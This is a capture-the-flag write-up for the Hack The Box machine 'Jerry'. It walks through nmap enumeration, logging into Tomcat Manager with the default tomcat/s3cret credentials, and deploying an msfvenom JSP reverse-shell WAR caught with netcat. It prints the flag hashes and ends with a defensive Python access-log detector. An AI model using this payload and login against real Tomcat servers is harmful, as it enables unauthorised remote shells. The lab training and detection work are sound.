[HTB Notes] Jerry

1. Check open ports
nmap --min-rate 1000 -p- -v 10.10.10.95
# 8080/tcp open  http-proxy
nmap -oN jerry -p8080 -sC -sV -v 10.10.10.95
# 8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
# |_http-favicon: Apache Tomcat
# | http-methods:
# |_  Supported Methods: GET HEAD POST OPTIONS
# |_http-server-header: Apache-Coyote/1.1
# |_http-title: Apache Tomcat/7.0.88

2. Enumerate Apache Tomcat service (port 8080)
[x] Click on Manager App
[x] 401 Unauthorized error page (no login credentials) shows an example tomcat-users.xml entry with working credentials:
<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
[x] Try to login to Manager App again
[x] USERNAME: tomcat
[x] PASSWORD: s3cret

3. Exploit war file upload in Apache Tomcat
[x] Create JSP reverse-shell payload (shell.war) using msfvenom
msfvenom -p java/jsp_shell_reverse_tcp LHOST=HTB_IPv4 LPORT=4444 -f war > shell.war
# Payload size: 1098 bytes
# Final size of war file: 1098 bytes
[x] Set up local listener
nc -lvp 4444
# Listening on [unknown] (family 0, port 462652714)
[x] Upload shell.war and navigate to http://10.10.10.95:8080/shell
[x] Back at the netcat listener, a Windows command shell arrives:
# C:\apache-tomcat-7.0.88>
#
cd ..
# C:\>
dir
# 06/18/2018  10:31 PM    <DIR>          Users
dir Users
# 06/18/2018  10:31 PM    <DIR>          Administrator
dir Users\Administrator
# 06/19/2018  06:09 AM    <DIR>          Desktop
dir Users\Administrator\Desktop
# 06/19/2018  06:09 AM    <DIR>          flags
dir Users\Administrator\Desktop\flags
# 06/19/2018  06:11 AM                88 2 for the price of 1.txt
type Users\Administrator\Desktop\flags\"2 for the price of 1.txt"
# user.txt
# 7004dbcef0f854e0fb401875f26ebd00
#
# root.txt
# 04a8b36e1545a455393d067e772fe90e
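As an added defender-side example (not part of these notes): a Python check over Tomcat access-log lines in the default `%h %l %u %t "%r" %s %b` pattern that flags requests to the manager deploy endpoints (`/manager/html/upload` for the HTML form, `/manager/text/deploy` for the text API) and the first request from the same host to a context that did not exist before, i.e. the upload-then-browse-to-/shell sequence above. The log lines are constructed, not captured from the box.

```python
import re

# Tomcat's default AccessLogValve pattern: %h %l %u %t "%r" %s %b
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
# Manager endpoints that accept a WAR: the HTML form upload and the text/script API
DEPLOY_PATHS = {"/manager/html/upload", "/manager/text/deploy"}

def parse_line(line):
    """Parse one access-log line into a dict; None if it does not match the pattern."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string (CSRF nonce etc.)
    return rec

def find_manager_deploys(lines):
    """Return (kind, host, user, path) alerts: every request to a manager deploy
    endpoint, plus the first request from that host to a context not seen before."""
    alerts, deployed_hosts, known_contexts = [], set(), set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ctx = rec["path"].strip("/").split("/", 1)[0]  # Tomcat context name ('' = ROOT)
        if rec["path"] in DEPLOY_PATHS:
            alerts.append(("manager_deploy", rec["host"], rec["user"], rec["path"]))
            deployed_hosts.add(rec["host"])
        elif rec["host"] in deployed_hosts and ctx not in ("", "manager") and ctx not in known_contexts:
            alerts.append(("new_context_after_deploy", rec["host"], rec["user"], rec["path"]))
        if ctx:
            known_contexts.add(ctx)
    return alerts

# Constructed sample log (not captured from the box): login attempt, upload, then the new /shell context
SAMPLE_LOG = """\
10.10.14.5 - - [19/Jun/2018:06:09:50 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - tomcat [19/Jun/2018:06:10:01 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 19440
10.10.14.7 - - [19/Jun/2018:06:10:05 +0000] "GET /docs/ HTTP/1.1" 200 7143
10.10.14.5 - - [19/Jun/2018:06:10:09 +0000] "GET /shell/ HTTP/1.1" 200 -
""".splitlines()

if __name__ == "__main__":
    for alert in find_manager_deploys(SAMPLE_LOG):
        print(alert)
```

The text API returns 200 with an `OK`/`FAIL` body either way, so every hit on a deploy endpoint is reported and the new-context follow-up is what confirms a successful deployment.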